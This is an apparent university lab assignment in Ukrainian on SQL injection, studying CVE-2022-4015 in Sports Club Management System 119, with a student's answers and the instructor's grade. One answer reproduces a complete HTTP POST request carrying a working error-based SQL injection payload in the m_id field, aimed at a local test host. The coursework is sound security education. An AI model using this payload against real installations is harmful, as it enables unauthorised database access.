CW7

[NikitunPVLK]

Запитання (7 балів)

Відомо, що Національний інститут стандартів і технологій США (National Institute of Standards and Technology, NIST) використовує дані системи оцінки поширених уразливостей (Common Vulnerability Scoring System, CVSS), які є у відкритому доступі за посиланням - https://nvd.nist.gov/vuln-metrics/cvss

В таблиці 1 наведено приклади URL-посилань з описами вразливостей програмного забезпечення (ПЗ), які можуть бути використані для реалізації атаки типу SQL-injection.

Таблиця 1 – Приклади описів вразливостей програмного забезпечення (ПЗ), які можуть бути використані для реалізації атаки типу SQL-injection	№	Приклади URL-посилань з описами вразливостей
9	https://nvd.nist.gov/vuln/detail/CVE-2022-4015

Запитання № 1 (1 бал)

Опишіть ПЗ, в якому знайдено вразливість:

• назва ПЗ, URL-посилання в інтернеті (знайти через пошукову систему);
• призначення ПЗ та приклади споживачів, які можуть бути зацікавлені у використанні ПЗ;

Запитання № 2 (1 бал)

Опишіть знайдену вразливість, переклавшу на українську розділ Description.

Запитання № 3 (1 бали)

Наведіть фрагменти прикладів уразливого програмного коду, розглянувши розділ References to Advisories, Solutions, and Tools.

Запитання № 4 (2 бали)

В таблиці 2 наведено URL-посилання на наукові публікації, пов’язані з SQL-injection.

Розглянувши приклад публікації, номер якої співпадає з номером вашого варіанту виконання лабораторних робіт, перекладіть української вказані назви розділи.

Таблиця 2 – URL-посилання на наукові публікації, пов’язані з SQL-injection	№	URL-посилання на наукову публікацію	Розділ для перекладу
9	https://www.researchgate.net/profile/Huma-Javed-2/publication/242586533_SQLIPA_An_authentication_mechanism_against_SQL_injection/links/00b4952e21e583de79000000/SQLIPA-An-authentication-mechanism-against-SQL-injection.pdf	3. Related Work

[NikitunPVLK]

Запитання №1

• Назва ПЗ - SPORTS CLUB MANAGEMENT SYSTEM 119;
• Url - https://vuldb.com/?product.sports_club_management_system;
• Призначення ПЗ - адміністрування спортивного клубу;
• Корисутвачі - адміністратори, тренери, клієнти, допоміжний персонал.

Запитання №2

Уразливість, яка класифікується як критична, виявлена в системі управління спортивним клубом 119. Вона впливає на невідому частину файлу admin/make_payments.php. Маніпуляція з аргументом m_id/plan призводить до sql ін'єкції. Ініціювати атаку можна віддалено. Експлойт викладено у відкритий доступ і може бути використаний. Даній уразливості присвоєно ідентифікатор VDB-213789.

[NikitunPVLK]

Запитання № 3

POST /dashboard/admin/submit_payments.php HTTP/1.1
Host: sportsvul.test
Content-Length: 213
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://sportsvul.test
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://sportsvul.test/dashboard/admin/make_payments.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=ogqe8040ok4a08i16t97ng7734
Connection: close

m_id=1529336794' and (select 2*(if((select * from (select concat((select user())))s), 8446744073709551610, 8446744073709551610)))-- &u_name=Christiana+Mayberry&prevPlan=Football+Plan&plan=BOQKJB&submit=ADD+PAYMENT

[oleksandrblazhko]

3 бали